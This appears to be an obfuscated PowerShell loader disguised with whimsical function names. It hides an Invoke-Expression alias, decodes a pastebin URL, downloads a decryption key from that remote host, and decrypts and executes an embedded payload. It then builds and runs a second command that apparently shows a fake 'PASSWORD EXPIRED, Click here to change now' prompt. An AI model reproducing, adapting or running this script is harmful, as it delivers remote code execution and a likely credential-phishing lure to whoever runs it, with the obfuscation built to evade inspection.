set-alias -Name i-am-sprinkles-the -Value IeX

function rainbow($sunshine) {
    $glitter = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($sunshine))
    return $glitter
}

function butterfly {
    $kisses = 'aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3dMMFFYcXJx'
    $monarch = '76492d1116743f0423413b16050a5345MgB8ACsATgB1AGwATgBKAHAASwBaAFIAWABFAHcAVQBNAFUAQQBaAHoAOABrAGcAPQA9AHwANwBiADAAOAAwAGMAZgA3ADcANgA2ADIAMABjADkANwA2ADUANwA5ADAAZQAxAGUANwA0ADAAOQAzADUAMQBiADIANgAwAGQAMAA3ADgANgA1ADEANwAwADUAOQBhADIANwAzAGYAZQA1ADgAYgA3ADgAYgAzAGQANgBiAGUANABiADEAMgAzAGMAYQAxADMANgBjADAANwBhADkANwA0ADYAMAA1ADYAYgBjAGQAOQBmADQANAAxAGEAYgAwADIANAAzADkAOQBkAGMAZQA3ADAANQAwADkAZAA5ADEAYQA0ADAAZgA3AGEAMgBlAGIAYgBmADQAZgBlADgAZQBhADEAOABkADMAOQBhAGQAMABkADYAYQA3ADkANAAxAGYAZQAyADUAYwA5AGIAYwA2ADgAYwA1ADQANABkAGUAZgBjADMAMAA2AGUAYQBlADIAYQA0AGEAYQBlADcAYQBjADUANQA0ADgAZABiADkAMQBmADEAOQAyADcAZgA0AGUAOABmADYAOQBlAGIAOAAzAGEAZAA3ADAAZgBjADYAZABkADgAZABmAGYAMQBhADQAZgBiADAANAAzAGUAMAA1ADQAMAA3ADMAMABkADUANgA3ADEAYgBmADkANQAwADYANAA5AGQAMAAzADQAYwA3AGIAOQAxADcAMQBjADYAZAA2AGMAZABkADYAMwBjADAAZAA0AGMAZAAxADAAYQAwAGEAZQAwADEAOQAxAGEAMQAyAGQANABkAGIANQBmAGMANwA4AGUANgA0ADEAZgA4ADcAMABhAGYAYgAxADEANQBhAGMAYgAxAGIAOAAyADcAMQA2ADAANQA3ADEAZQAzADgAYgBjADYAOAA5AGUANQA4AGYAOQBlAGYAYgAyADAAYgBjADIAMQAwADgAZQAwADgAZgA2AGEANgA4AGEAMQA1AGQAZgBlADIAZgBhADMAOAAxAGMANQBjAGIAZQAwADUANAAwADEAMQAwAGYAZgBiAGUANQA4ADQAMwBkADcAZAA4AGUAMAA3ADEAMwAzAGYAOQA2ADgAOABkAGEANAAxAGYAMgAxAGYANwA5ADEAZABhADUAYwAzADYAOQAzADgAMwBiAGUANQAzAGIAMABkADIAZABjAGQAYgBkAGQANgBlADMAMgA4AGIAZgA4ADkAOAAwADIANgA1ADYAZgAwAGUAYwA2AGUAMgBkAGEAMgBiADIAMAA4ADEAZQAyADEANQA1AGMAZABhADkAMABhADYAZQA5AGQAMAA0ADYAZgBhADUAYQAzADkAYgA4AGYAOQBhADkAMwBkADQAZgAyADMAYQA0ADAANgAwADUAMwA4ADkAZgAwADIANwAyAGIAZgBhADQAYgA4ADYANgAyAGUANwA1ADYAZABkADYAMgA0AGUAZQBhADkAOAAyADAAYQBjAGYAYQAyAGUANwA5AGIAYgA5AGQAZABiADIANgBjAGQAZAA3ADIANABhADYANwBmADkANABjADcAMgBmADUAOAAzADYAMwBhAGUAOABlADgAMQAwAGIANAA0ADgAMwAyAGEANgAyAGMAZQA3ADUAMwAwADcAMwA1ADgAMAAyAGIAYwBkAGYAOABjADQANwA4ADIAMgBjADkAMAAyADAANQBkAGIAMgBlADEAYQBjADQAZABlADkAMwBiADkAMwAwAGYAMQBkAGMAMQA2AGYAZgA0ADUANwBiAGEAYwBlADQAZQA3ADQANgA4AGEAMAA1AGQANwBmADkAOQAzADgANQA5ADQAYQA0AGMAZgAxADMAZgBjADUANgA2ADMANgBmADIAMAAwADYAOQBjAGQAYQBmADYAOABiADQAZQA5AGEANwA2AGMAZQBmADUAZQBlAGUAMQA2AGEAZABlADIAMgAyADEAMQA5AGYAOQAxADAAOAA2AGEANwBmADQAMwA3ADMAZQAzADIAZgBkADMAOABjAGQAOABlAGEAYgBjADUAZABjAGIAYgBlAGYAMABkADkAYgA1AGIAYwBlAGEAMwA2ADEAMQBiADEANQAxADUANwBiADEAOQA4ADAAYQBjADgAYwA0AGEAOQBlAGYAZQA1AGQAYQA3ADgAYQA4AGYAOQA5AGEANgBkAGYAYgA3AGEAMwBlADMANgBkAGYAOAA2ADIAMwBkADAAMgBlADgAZAA0AGUAMgA2ADkAMwA4AGUAYwBlAGQAMABlADIAMwA5ADIAZQBjADgANQBiADkAZgA5ADUAZABjAGUAMwBjADkANQBjADkANwA4AGEANwBmADQAMABlAGYAMgBhADcAOQAzADgANABiADUANAA1AGUANgAzAGMAMgBiADEAYwAyADMAYwA3ADgAMgA5ADYAZQAyAGEAMgAyADEAMwA1AGQANgAwADkAZgAyADIAOQBmADkAYgA1AGQAMwBiADYAMwAwADEAMgAwADAAZgAyADgANgBiADYAYQA0AGUAMQAwAGYAYwBjADcAYwBhAGUAYgA2AGEAYwAzADYAZABiADIAMQA3AGMAOQBlADIAMwBiADYAZABjADgANQA4AGUANAA2AGEANQBhADQANQBjAGUAOQBkADQAOQBmADcANQAzAGQAOAAzADUAOAAzADcAMQAzADcAMQBjAGYAYwAyADEANABlAGUAZQAzAGMAYwA0ADgAYgBlADEAMAAyADQAZQA1ADgANAAxADYAMQAyAGMAMwAzAGYAMABjAGYAZQAwADkANwA3ADYAYgA3ADMAMgAxADQANgBhAGIAYwBkADEANAA2ADMAZgA0AGMAZAA4AGEANQBjADQA'
    $flower = &('{2}{0}{1}' -f 'E', 'X', 'I')((New-Object System.Net.NetworkCredential("", (ConvertTo-SecureString -k ((&('{2}{0}{1}' -f 'w', 'R', 'I') (rainbow $kisses) | Select-Object -ExpandProperty Content) -split ',') $monarch))).Password)
    $colorful = $flower -split ''
    return $colorful
}

function pony {
    $trot = butterfly
    $01 = ($trot[69], $trot[8], $trot[22], $trot[4], $trot[26], $trot[22], $trot[65], $trot[13], $trot[120], $trot[13] -join '')
    $02 = ($trot[2])
    $03 = ($trot[15])
    $04 = ($trot[45])
    $05 = ($trot[2])
    $06 = ($trot[118], $trot[119], $trot[119], $trot[119], $trot[119] -join '')
    $07 = ($trot[2])
    $08 = ($trot[15], $trot[48] -join '')
    $09 = ($trot[27])
    $10 = ($trot[118])
    $11 = ($trot[39])
    $12 = ($trot[33], $trot[35], $trot[2] -join '')
    $13 = "PASSWORD EXPIRED"
    $14 = ($trot[2], $trot[15], $trot[4] -join '')
    $15 = ($trot[2])
    $16 = "Click here to change now."
    $17 = ($trot[2], $trot[15], $trot[3] -join '')
    $18 = " 10"
    $19 = ($trot[2])
    $20 = ($trot[15], $trot[164] -join '')
    $21 = ($trot[2])
    $22 = "https://acegif.com/wp-content/gif/unicorn-80.gif"
    return ($01, $02, $03, $04, $05, $06, $07, $08, $09, $10, $11, $12, $13, $14, $15, $16, $17, $18, $19, $20, $21, $22)
}

function unicorn {
    $little = pony
    $fly = ''
    Foreach ($sky in $little) { $fly += $sky }
    return $fly
}

i-am-sprinkles-the(unicorn)